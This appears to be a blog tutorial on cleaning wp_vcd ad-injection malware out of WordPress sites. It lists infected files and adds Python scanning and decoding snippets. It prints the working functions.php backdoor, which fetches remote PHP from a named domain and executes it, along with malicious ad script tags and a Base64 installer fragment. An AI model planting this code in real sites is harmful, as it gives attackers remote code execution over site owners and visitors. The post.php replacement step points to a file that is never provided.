A lot of WordPress users don't even know that their websites contain malicious ads code. Sometimes the code can be found in plain text form; sometimes you need to decode it from Base64 format into UTF-8. This code mostly targets users who are viewing your site on mobile phones or tablets. Hackers use this technique because many WordPress users don't know what the fuck this code is. It redirects your visitors to a new site: when they want to read a post or click anywhere on your site, a new window opens automatically. There are many security plugins for WordPress, but they can't show exactly where the code is and which one is doing this. Today, we are going to show you how to remove malicious ads code from a WordPress site.
Examples of Malicious Ads Code
- Simple Text Form
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1565312&interactive=1&pushup=1"></script> <script src="//defpush.com/ntfc.php?p=1565634" data-cfasync="false" async></script>
hxxp://go·pub2srv·com/apu·php?zoneid=1566502
<sc?ript data-cfasync="false" type="text/javascript" src="hxxp://go.pub2srv.com/apu.php?zoneid=1566502" async onerror="_gdronek()" onloaded="_zygdglq()"> < / sc?ript>
- Base64 Format
$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
How to know or check whether the site is affected or not?
There are mainly two ways to check. One is Sucuri Security and the other is File Viewer, a Free Website Malware Scanner - Aw Snap. Both sites scan your website and detect all the malicious code if there is any. Just visit their websites and run a complete scan of your website. If you have used nulled themes or plugins, the code shown in the examples above may appear.
What to do if Sucuri Security and File Viewer, a Free Website Malware Scanner - Aw Snap detect some Malicious Ads code?
Both sites will probably show the same malicious code. Now log in to your site. Go to Plugins > Add New and search for "String Locator". Install the one developed by Clorith. Then go to Tools > String Locator. The String Locator search page will appear.
Then copy some unique words from the malicious code, like "go.mobisla.com", put them in the box to the right of the search string label and hit the search button. It will find the code and also show which folder contains it. Go to the folder through the cPanel File Manager or click the edit button. After that, delete the malicious ads code. Note: the following image is just a sample to show you that there is an edit button; I have searched for javascript and it is showing it in that folder.

This alone is not enough; please follow the instructions below too, as the code might reappear after some time.
Which WordPress Folders Get Mostly Attacked by this type of Virus?
Mostly these folders get attacked by this type of code.
- yoursite/wp-content/themes/current_theme/functions.php
- yoursite/wp-includes/post.php
- yoursite/wp-includes/wp-tmp.php
- yoursite/wp-includes/wp-vcd.php
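As an added example (not part of the original article), the read-only Python scan below does across a whole install what the String Locator search does for one string: it looks for the strings quoted in this article's samples and reports file and line. The function names and the constructed sample tree are illustrative, and flagging wp-tmp.php and wp-vcd.php by name alone is an assumption of this example based on the list above.

```python
import os
import tempfile

# Strings quoted in this article's malware samples.
INDICATORS = [
    "go.mobisla.com", "defpush.com", "go.pub2srv.com",
    "wp_vcd", "code4.php", "theme_temp_setup", "$install_code",
]
# Names from the article's list; flagging them by name is this example's assumption.
SUSPECT_NAMES = {"wp-tmp.php", "wp-vcd.php"}
SCAN_EXT = (".php", ".js", ".html", ".htm")

def scan_tree(root):
    """Return sorted (relative_path, line_no, indicator); line_no 0 is a file-name hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name in SUSPECT_NAMES and rel.startswith("wp-includes/"):
                hits.append((rel, 0, "suspect file name"))
            if not name.lower().endswith(SCAN_EXT):
                continue
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for no, line in enumerate(fh, 1):
                    low = line.lower()
                    for ind in INDICATORS:
                        if ind.lower() in low:
                            hits.append((rel, no, ind))
    return sorted(hits)

def build_sample(root):
    """Constructed mini WordPress tree: two infected files and one clean file."""
    files = {
        "wp-content/themes/current_theme/functions.php":
            '<?php\n$div_code_name = "wp_vcd";\n',
        "wp-includes/wp-vcd.php": "<?php\n$install_code = '...';\n",
        "wp-includes/clean.php": "<?php\necho 'hello';\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, no, ind in scan_tree(tmp):
            print(f"{rel}:{no}: {ind}")
```

To check a real site, call scan_tree() on a downloaded copy of the site's files; the script only reads files and changes nothing.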
Malicious code in functions.php of theme
Directory: /yoursite/wp-content/themes/current_theme/functions.php
The following type of code can be found in both functions.php files, of my WordPress theme and of its child theme. A nulled plugin had injected this code at the beginning of the functions.php file. In functions.php, the malicious code mostly starts right after <?php if the site is infected. Let's have a look at the code. Delete this type of code and hit the save changes button.
if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['password'] ) && ( $_REQUEST['password'] == '227972a1a62825660efb0f32126db07f' ) ) {
    $div_code_name = "wp_vcd";
    switch ( $_REQUEST['action'] ) {
        case 'change_domain';
            if ( isset( $_REQUEST['newdomain'] ) ) {
                if ( ! empty( $_REQUEST['newdomain'] ) ) {
                    if ( $file = @file_get_contents( __FILE__ ) ) {
                        if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain ) ) {
                            $file = preg_replace( '/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file );
                            @file_put_contents( __FILE__, $file );
                            print "true";
                        }
                    }
                }
            }
            break;
        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die( "" );
}
if ( ! function_exists( 'theme_temp_setup' ) ) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[ REQUEST_URI ];
    if ( stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) {
        if ( $tmpcontent = @file_get_contents( "http://www.dolsh.cc/code4.php?i=" . $path ) ) {
            function theme_temp_setup( $phpCode ) {
                $tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
                $handle = fopen( $tmpfname, "w+" );
                fwrite( $handle, "<?php\n" . $phpCode );
                fclose( $handle );
                include $tmpfname;
                unlink( $tmpfname );
                return get_defined_vars();
            }
            extract( theme_temp_setup( $tmpcontent ) );
        }
    }
}
Malicious Ads code in wp-includes/post.php
Directory: /yoursite/wp-includes/post.php
Just download this post.php file and then upload it to /yoursite/wp-includes. The main purpose of this is to replace or overwrite the previous one.
Malicious code in wp-includes/wp-tmp.php
Directory: /yoursite/wp-includes/wp-tmp.php
Open this wp-tmp.php file in edit mode. Search for malicious code like that shown in the examples below.
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1565312&interactive=1&pushup=1"></script> <script src="//defpush.com/ntfc.php?p=1565634" data-cfasync="false" async></script>
hxxp://go·pub2srv·com/apu·php?zoneid=1566502
<sc?ript data-cfasync="false" type="text/javascript" src="hxxp://go.pub2srv.com/apu.php?zoneid=1566502" async onerror="_gdronek()" onloaded="_zygdglq()"> < / sc?ript>
You can either delete this code or delete everything except the following code, and then hit the save changes button:
ini_set('display_errors', 0);
error_reporting(0);
You can copy and paste only this code into your tmp.php file.
Malicious Ads code in wp-includes/wp-vcd.php
Directory: /yoursite/wp-includes/wp-vcd.php
Open this wp-vcd.php file in edit mode. Search for malicious code like that shown in the examples below. Here you can find some malicious code in Base64 format. You can easily decode it from here.
$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
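As an added example (not part of the original article), the Python snippet below decodes a Base64 string literal like the $install_code value above offline, without executing it, and reports which strings from this article appear in the decoded text. The regular expression, the marker list and the sample payload are constructed for illustration; the article's own $install_code value is truncated and is not used.

```python
import base64
import re

# Matches PHP single-quoted string literals of 24+ base64 characters.
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{24,}={0,2})'")
# Strings from this article worth flagging inside a decoded payload.
MARKERS = ["{$PASSWORD}", "wp_vcd", "code4.php", "file_put_contents", "eval("]


def decode_literals(php_source):
    """Return [(decoded_text, markers_found)] per base64 literal; nothing is executed."""
    results = []
    for literal in B64_LITERAL.findall(php_source):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:
            continue  # looked like base64 but does not decode (bad length or padding)
        text = raw.decode("utf-8", errors="replace")
        found = [m for m in MARKERS if m in text]
        results.append((text, found))
    return results


# Constructed sample: an inert stand-in payload, stored the way the article's
# wp-vcd.php sample stores it, with the {$PASSWORD} placeholder still in place.
_PAYLOAD = "<?php if ($_REQUEST['password'] == '{$PASSWORD}') { $div_code_name = 'wp_vcd'; }"
SAMPLE_PHP = (
    "$install_code = '" + base64.b64encode(_PAYLOAD.encode()).decode() + "';\n"
    "$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);\n"
    "$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));\n"
)

if __name__ == "__main__":
    for text, found in decode_literals(SAMPLE_PHP):
        print("markers:", found)
        print(text[:200])
```

The {$PASSWORD} placeholder visible in the decoded text is what the str_replace() line above swaps for md5(HTTP_HOST . AUTH_SALT), so the injected password differs on every site.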
Delete all of this code and click the save changes button.
Finally, make sure to scan your site on Sucuri Security and on File Viewer, a Free Website Malware Scanner - Aw Snap. Furthermore, if you still have some questions or problems, please contact me at info@techrusher.com. If you find this article helpful, please write a comment.



